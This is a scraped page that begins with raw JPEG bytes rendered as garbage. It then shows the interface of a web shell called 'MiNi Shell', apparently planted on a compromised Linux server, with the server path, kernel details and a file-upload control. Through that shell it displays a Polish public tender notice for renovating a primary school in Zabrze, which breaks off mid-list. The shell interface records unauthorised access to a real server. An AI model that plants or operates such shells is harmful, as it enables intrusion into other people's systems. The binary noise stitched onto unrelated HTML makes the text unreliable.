JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20240926/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20240926/0051829601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Powrót do blasku eklektycznej architektury Szkoły Podstawowej nr 5 w Zabrzu przy ul. Królewskiej 4 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIASTO ZABRZE – PREZYDENT MIASTA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276255520</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Powstańców Śląskich 5-7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zabrze</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-800</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL229 - Gliwicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat_bzp@um.zabrze.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://miastozabrze.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Powrót do blasku eklektycznej architektury Szkoły Podstawowej nr 5 w Zabrzu przy ul. Królewskiej 4 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-68fbba44-d0c2-4311-bac6-af0cef934b66</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00518296</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-09-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00046203/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.24 Powrót do blasku eklektycznej architektury - modernizacja budynku Szkoły Podstawowej nr 5 w Zabrzu przy ul. Królewskiej 4</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zabrze.logintrade.net/zapytania_email,176999,93ed3c961b9885187c799c4d99eed2dd.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zabrze.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Wykonawca zamierzający złożyć ofertę (wyłącznie poprzez Platformę przetargową) – zobowiązany jest zapoznać się z instrukcjami użytkowników Platformy przetargowej - dostępnymi pod adresem<br/>https://zabrze.logintrade.net/rejestracja/instrukcje.html oraz zaakceptować regulamin korzystania z Platformy przetargowej dostępny pod adresem:<br/>https://zabrze.logintrade.net/rejestracja/regulamin.html <br/>2.	Złożenie oferty poprzez Platformę przetargową oznacza akceptację regulaminu, o którym mowa w pkt 1 niniejszego Rozdziału SWZ.<br/>3.	Wymagania techniczne związane z korzystaniem z Platformy przetargowej – wskazane są na stronie internetowej Platformy przetargowej - pod adresem:<br/>https://zabrze.logintrade.net/rejestracja/instrukcje.html <br/>4.	Wsparcia technicznego w zakresie działania Platformy przetargowej udziela jej dostawca, tj. Logintrade SA ul. Legnicka 57D, lokal B/J, 54-203 Wrocław, nr tel. 71 787 35 34, e-mail: helpdesk@logintrade.net od poniedziałku do piątku (dni robocze) w godz. 8:00 - 16:00.<br/>5.	Sposoby złożenia oferty za pośrednictwem Platformy przetargowej oraz potwierdzenia złożenia oferty (w zależności od wyboru opcji z logowaniem lub bez logowania), zostały opisane w Instrukcjach użytkowników Platformy przetargowej.<br/>6.	Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi w Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452).<br/>7.	Wszelkie informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913), które Wykonawca zastrzeże jako tajemnicę przedsiębiorstwa, powinny zostać złożone w osobnym pliku wraz z jednoczesnym zaznaczeniem polecenia „Załącznik stanowiący tajemnicę przedsiębiorstwa” a następnie wraz z plikami stanowiącymi jawną część skompresowane do jednego pliku archiwum (zip). Wykonawca zobowiązany jest, wraz z przekazaniem tych informacji, wykazać spełnienie przesłanek określonych w art. 11 ust. 2 ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji. Zaleca się, aby uzasadnienie zastrzeżenia informacji jako tajemnicy przedsiębiorstwa było sformułowane w sposób umożliwiający jego udostępnienie. Zastrzeżenie przez Wykonawcę tajemnicy przedsiębiorstwa bez uzasadnienia, będzie traktowane przez Zamawiającego jako bezskuteczne ze względu na zaniechanie przez Wykonawcę podjęcia niezbędnych działań w celu zachowania poufności objętych klauzulą informacji zgodnie z postanowieniami art. 18 ust. 3 Pzp.<br/>8.	W przypadku przesłania przez Wykonawcę dokumentów elektronicznych skompresowanych (w tym oferta), dopuszczone są formaty danych wskazanych w Rozporządzeniu Rady Ministrów z dnia 21 maja 2024 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (Dz. U. z 2024 r. poz. 773) – z zastrzeżeniem, iż Zamawiający dopuszcza także przesyłanie dokumentów elektronicznych (w tym oferty) skompresowanych np. formatem .rar po uprzednim ich skompresowaniu do innego formatu wskazanego w ww. Rozporządzeniu.<br/>9.	W przypadku przekazywania w postępowaniu dokumentu elektronicznego w formacie poddającym dane kompresji, opatrzenie pliku zawierającego skompresowane dokumenty kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, jest równoznaczne z opatrzeniem wszystkich dokumentów zawartych w tym pliku odpowiednio kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>CD w pozostałych informacjach w sekcji IX</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna dotycząca przetwarzania danych osobowych<br/>W związku z przetwarzaniem Pani/Pana danych osobowych informujemy,zgodnie z art.13 ust. 1 i ust.2 Rozporządzenia<br/>ParlamentuEuropejskiego i Rady(UE)2016/679 z dnia 27.04.2016r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem<br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/>ochronie danych) (Dz.Urz.UE L z 04.05.2016r.,Nr119, s.1, ze zm.),zw.dalej„RODO”, iż:<br/>1.ADMINISTRATOR DANYCH.<br/>Administratorem Pani/Pana danych osobowych jest Prezydent Miasta Zabrze, którego siedziba mieści się w Urzędzie Miejskim<br/>wZabrzu, 41-800,przy ul.Powstańców Śląskich nr5-7.<br/>2.Kontakt Z ADMINISTRATOREM DANYCH<br/>Z Prezydentem Miasta Zabrze może się Pani/Pan skontaktować w sprawach związanych z ochroną danych osobowych, w następujący sposób:<br/>1)pod adresem poczty elektronicznej:umz@um.zabrze.pl,<br/>2)pod numerem telefonu:32 373 33 00,<br/>3)pisemnie na adres:Urząd Miejski w Zabrzu,41-800,przy ul. PowstańcówŚląskich nr 5-7 z dopiskiem „Ochrona danych osobowych”.<br/>3.INSPEKTOR OCHRONY DANYCH<br/>Administrator wyznaczył Inspektora Ochrony Danych, z którym może się Pani/Pan skontaktować w sprawach związanych z ochroną<br/>danych osobowych,w następujący sposób:<br/>1) pod adresem poczty elektronicznej:iod@um.zabrze.pl<br/>2) pod nr tel.:32 373 33 00,<br/>3) pisemnie na adres:Urząd Miejski w Zabrzu,41-800, przy ul.Powstańców Śląskich nr 5-7 z dopiskiem„Inspektor ochrony danych”.<br/>4.PODSTAWA PRAWNA I CELE PRZETWARZANIA DANYCH OSOBOWYCH.<br/>4.1.PrzetwarzaniePani/Pana danych odbywa się w celu realizacji postępowania o udzielenie zamówienia publicznego.<br/>4.2.Podstawą prawną zbierania Pani/Pana danych osobowych jest:<br/>1)art.6 ust. 1 lit. c RODO,tj. obowiązek prawny ciążący na administratorze wynikający z przepisów ustawy z dnia11września 2019 r.<br/>Prawo zamówień publicznych,zwanej dalej PZP,<br/>2)art.6 ust. 1 lit. b RODO, tj. przetwarzanie jest niezbędne do wykonania umowy,której stroną jest osoba, której dane dotyczą lub do<br/>podjęcia działań na żądanie osoby,której dane dotyczą przed zawarciem umowy.<br/>4.3.Zgodnie z art.19 ust.5 PZP Zamawiający przetwarza dane osobowe zebrane w postępowaniu o udzielenie zamówienia w sposób<br/>gwarantujący zabezpieczenie przed ich bezprawnym rozpowszechnianiem.<br/>5.ODBIORCY DANYCH OSOBOWYCH.<br/>Pani/Pana dane mogą zostać udostępnione podmiotom i instytucjom upoważnionym na podstawie przepisów prawa oraz odbiorcom<br/>będącym podmiotami przetwarzającymi,w szczególności świadczącym usługi IT na zlecenieMiastaZabrze. Podmiotem świadczącym<br/>usługi IT w zakresie ewidencyjno-księgowym jest Asseco Data Systems S.A. z siedzibą wGdyni. Podmiotem świadczącym usługi w<br/>zakresie konfiguracji i uruchomienia Platformy Przetargowej (będącej środkiem komunikacji elektronicznej za pomocą której odbywa<br/>się komunikacja Zamawiającego z Wykonawcami)oraz jej bieżącej obsługi jest PZP24.pl Sp. z o.o. z siedzibą weWrocławiu,ul.Legnicka 57D lok. B/J. Pani/Pana dane mogą zostać również udostępnione podmiotom,którym udostępniona zostanie dok. postępowania w ramach przeprowadzanych kontroli zewnętrznych oraz w oparciu o art.18 ust.1 i 6 oraz art. 74 ust.1, 2 i 4 ustawyz11 września 2019r.Prawo zamówień publicznych.W przypadku korzystania ze środków ochrony prawnej,o których mowa w art.18 ust.6<br/>Pzp Pani/Pana dane osobowe mogą zostać udostępnione Krajowej Izbie Odwoławczej,a w przypadku wniesienia skargi na orzeczenie Izby oraz postanowienie Prezesa Izby,o którym mowa w art.519 ust.1PZP, Pani/Pana dane osobowe mogą zostać udostępnione SądowiOkręgowemu wWarszawie – sądowi zamówień publicznych.W przypadku konieczności zasięgnięcia opinii prawnej w toku prowadzonego postępowania Pani/Pana dane osobowe mogą zostać udostępnione podmiotowi świadczącemu usługę obsługi prawnej na zlecenie Miasta Zabrze. <br/>C.D. w pkt 3.16</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">C.D. z pkt. 3.15 W związku z koniecznością wypełnienia obowiązku,o którym mowa w<br/>art.81,art.309 ust.1 oraz art.448PZP Pani/Pana dane osobowe zostaną zamieszczone wBiuletynie Zamówień<br/>Publicznych.Podmiotem udostępniającym system umożliwiający prowadzenie strony Biuletynu Zamówień Publicznych (platforma<br/>eZamówienia) jestUrząd Zamówień Publicznych z siedzibą wWarszawie przy ul. Postępu 17A. W związku z koniecznością<br/>wypełnienia obowiązku, o którym mowa w art. 265 ust. 1 Pzp Pani/Pana dane osobowe zostaną zamieszczone w<br/>DziennikuUrzędowymUnii Europejskiej.Podmiotem udostępniającym system umożliwiający prowadzenie strony Dziennika<br/>UrzędowegoUnii Europejskiej (platforma e-Notices2) jest Urząd PublikacjiUnii Europejskiej z siedzibą wLuksemburgu.W zakresie w<br/>jakim Pani/Pana dane osobowe będą stanowiły informację publiczną odbiorcami Pani/Pana danych osobowych będą osoby<br/>przeglądające Biuletyn Informacji Publicznej Urzędu Miejskiego w Zabrzu oraz osoby,które skorzystają z prawa dostępu do<br/>informacji publicznej. Podmiotem udostępniającym system umożliwiający prowadzenie strony Biuletynu Informacji Publicznej jest<br/>BetaSoft Sp. z o.o. z siedzibą wBytomiu.W niektórych przypadkach podmioty zewnętrzne świadczące usługi na<br/>zlecenie Miasta Zabrze mogą występować w roli niezależnych administratorów np.poczta polska lub inni operatorzy pocztowi, w tym<br/>firmy kurierskie.<br/>6.OKRES PRZECHOWYWANIA DANYCH OSOBOWYCH.<br/>Pani/Pana dane osobowe w przypadku postępowań o udzielenie zamówienia publicznego będą przechowywane przez okres<br/>oznaczony kategorią archiwalną wskazaną w Jednolitym Rzeczowym Wykazie Akt.Dla dokumentów wytworzonych w ramach<br/>zamówień klasycznych,których wartość jest równa lub przekracza kwotę130 000 złotych jest to okres 5 lat (kat.arch.B5). Dla<br/>dokumentów wytworzonych w ramach zamówień klasycznych dofinansowanych ze środkówUniiEuropejskiej,okres przechowywania<br/>określony jest indywidualnie dla każdej umowy o dofinansowanie projektu.Natomiast umowy cywilno-prawne wraz z dokumentacją<br/>dotyczącą ich realizacji,niezależnie od trybu w jakim zostały zawarte, przechowywane są przez okres10 lat (kat. arch. B10).Okres<br/>przechowywania liczony jest od1 stycznia roku następnego od daty zakończenia sprawy.Po upływie okresu przechowywania<br/>dokumentacja niearchiwalna podlega, po uzyskaniu zgody dyrektora właściwego archiwum państwowego, brakowaniu.<br/>7.PRAWA OSÓB,KTÓRYCH DANE DOTYCZĄ, W TYM DOSTĘPU DO DANYCH OSOBOWYCH.<br/>Na zasadach określonych przepisami RODO,posiada Pani/Pan prawo do żądania od Administratora:<br/>1) dostępu do treści swoich danych osobowych,<br/>2) sprostowania (poprawiania) swoich danych osobowych,<br/>3) ograniczenia przetwarzania swoich danych osobowych.<br/>8.PRAWO WNIESIENIA SKARGI DO ORGANU NADZORCZEGO.<br/>Gdy uznaPani/Pan,że przetwarzanie Pani/Pana danych osobowych narusza przepisy o ochronie danych osobowych,<br/>przysługujePani/Panu prawo do wniesienia skargi do organu nadzorczego,którym jest Prezes Urzędu Ochrony Danych Osobowych,z<br/>siedzibą w Warszawie,przy ul.Stawki 2,00-193 Warszawa.<br/>9.INFORMACJA O WYMOGU/DOBROWOLNOŚCI PODANIA DANYCH ORAZ KONSEKWENCJACH NIEPODANIA DANYCH<br/>OSOBOWYCH.<br/>9.1.Podanie przez Panią/Pana danych osobowych może stanowić wymóg ustawowy, umowny bądź być warunkiem zawarcia umowy, a podanie danych jest niezbędne dla określonego celu.<br/>9.2.Jeśli nie poda Pani/Pan danych wymaganych ustawą, Administrator nie będzie mógł zrealizować wynikającego z ustawy<br/>obowiązku,co może skutkować w szczególności brakiem możliwościPani/Pana udziału w postępowaniu o udzielenie zamówienia, a<br/>także innymi konsekwencjami przewidzianymi przepisami prawa.<br/>9.3.Jeśli nie podaPani/Pan danych wymaganych umową, nie będzie można zawrzeć takiej umowy lub jej wykonać.<br/>10.ZAUTOMATYZOWANE PODEJMOWANIE DECYZJI, PROFILOWANIE.<br/>Nie będziePani/Pan podlegać decyzji, opierającej się na zautomatyzowanym przetwarzaniu,która jednocześnie będzie wywoływała<br/>wobecPani/Pana skutki prawne lub w podobny sposób istotnie naPanią/Pana wpływała.Pani/Pana dane osobowe nie będą<br/>profilowane.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BZP.271.43.2024.MK</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 3110801,61 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest: renowacja elewacji budynku Szkoły Podstawowej Nr 5 przy ul. Królewskiej w Zabrzu wraz z wykonaniem prac towarzyszących.<br/>Zadanie obejmuje zakres podstawowy oraz opcje.<br/>Zakres zadania w zakresie podstawowym obejmuje m.in.:<br/>- Remont dachu - demontaż elementów wyposażenia,<br/>- Remont dachu - rozbiórka pokrycia dachu - fragment kryty dachówką karpiówką<br/>- Remont dachu - wymiana elementów więźby dachowej (bez deskowania i łacenia)<br/>- Remont dachu - łacenie powierzchni dachu, układanie dachówki ceramicznej, obróbki elementów fragmentu dachu.<br/>- Remont dachu - wywóz i utylizacja materiałów demontażowych,<br/>- Wymiana stolarki drzwiowej,<br/>- Renowacja elewacji - demontaż elementów wyposażenia,<br/>- Renowacja elewacji - naprawa pęknięć i zarysowań murów (zszycie),<br/>- Renowacja elewacji - usunięcie powłok malarskich z cegieł i kształtek ceglanych,<br/>- Renowacja elewacji - wymiana uszkodzonych cegieł i kształtek,<br/>- Renowacja elewacji - spoinowanie powierzchni ceglanej, patynowanie powierzchni, impregnacja murów z cegły,<br/>- Renowacja elewacji - płyciny tynkowe,<br/>- Renowacja elewacji - renowacja kamiennych kolumn i powierzchni kamiennych,<br/>- Renowacja elewacji - elementy stalowe na elewacji budynku i kraty okienne,<br/>- Renowacja elewacji - balkon i posadzki w strefie wejść do budynku od strony południowej,<br/>- Renowacja elewacji - Instalacja odgromowa,<br/>- Renowacja balustrady na dachu,<br/>- Renowacja elewacji - strefy wejść do budynku od strony południowej i północnej - na-wierzchnia N4,<br/>- Renowacja elewacji - wywóz materiałów rozbiórkowych,<br/>- Renowacja elewacji i remont dachu– rusztowania,<br/>- Izolacja pionowa ścian zewnętrznych budynku głównego,<br/>- Opaska żwirowa wzdłuż ścian zewnętrznych budynku głównego,<br/>- Izolacja pionowa budynku - wywóz materiałów,<br/>- Renowacja ścian wewnętrznych,<br/>- Wymiana stolarki okiennej – suterena,<br/>- Wymiana stolarki - wywóz materiałów,<br/>- Renowacja stolarki drzwiowej,<br/>- Renowacja stolarki wywóz materiałów,<br/>- Roboty ziemne odtworzeniowe (w tym odtworzenia nawierzchni w miejscach wykonywanych robót wokół budynku, nawierzchnia w pasie drogowym),<br/>- Kanalizacja deszczowa.<br/><br/>W ramach zamówienia Zamawiający, uprawniony jest do skorzystania z prawa opcji na zasadach i trybie opisanym poniżej:<br/><br/>1) Opcja nr 1 – remont dachu papowego w zakres, którego wejdą następujące roboty (zakres zgodny <br/>z przedmiarem robót dla opcji nr 1):<br/>- rozbiórka pokrycia dachu - fragment pokryty papą,<br/>- wymiana elementów więźby dachowej (bez deskowania i łacenia),<br/>- impregnacja elementów więźby przed biokorozją,<br/>- zabezpieczenie preparatem p.poż. dachu - montaż odcinków rur spustowych z blachy ocynkowanej,<br/>- deskowanie powierzchni dachu, krycie papą termozgrzewalną obróbki blacharskie,<br/>- wywóz i utylizacja materiałów demontażowych,<br/>- montaż rusztowań,<br/><br/>2) Opcja nr 2 – wymiana pozostałej stolarki okiennej nieujętej w zakresie podstawowym (zakres zgodny z przedmiarem robót dla opcji nr 2):<br/>- wymiana stolarki okiennej<br/>- renowacja stolarki okiennej<br/>- wymiana i renowacja stolarki okiennej - wywóz materiałów.<br/><br/>3) Opcja nr 3 – wymiana stolarki drzwiowej nieujętej w zakresie podstawowym (zakres zgodny <br/>z przedmiarem robót dla opcji nr 3)<br/><br/>Wykonanie prac, o których wyżej mowa nastąpi na warunkach cenowych wskazanych przez Wykonawcę w Formularzu Oferty.<br/>Zamawiający może skorzystać z prawa opcji w przypadku dysponowania środkami na sfinansowanie prawa opcji, uruchomienie prawa opcji nastąpi poprzez złożenie w tym zakresie przez Zamawiającego oświadczenia (w wymaganej formie pisemnej), zastrzega się, iż prawo opcji (zakres opcjonalny zamówienia) nie stanowi zobowiązania umownego (w tym finansowego) zaciąganego w momencie zawarcia umowy, a przewidywany zakres opcjonalny zamówienia nie jest gwarantowany do realizacji (Zamawiający może, ale nie musi skorzystać z prawa opcji). <br/>3.	Szczegółowy opis przedmiotu zamówienia zawiera Część III SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45262100-2 - Roboty przy wznoszeniu rusztowań</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45262300-4 - Betonowanie</p> <p class="mb-0">45261210-9 - 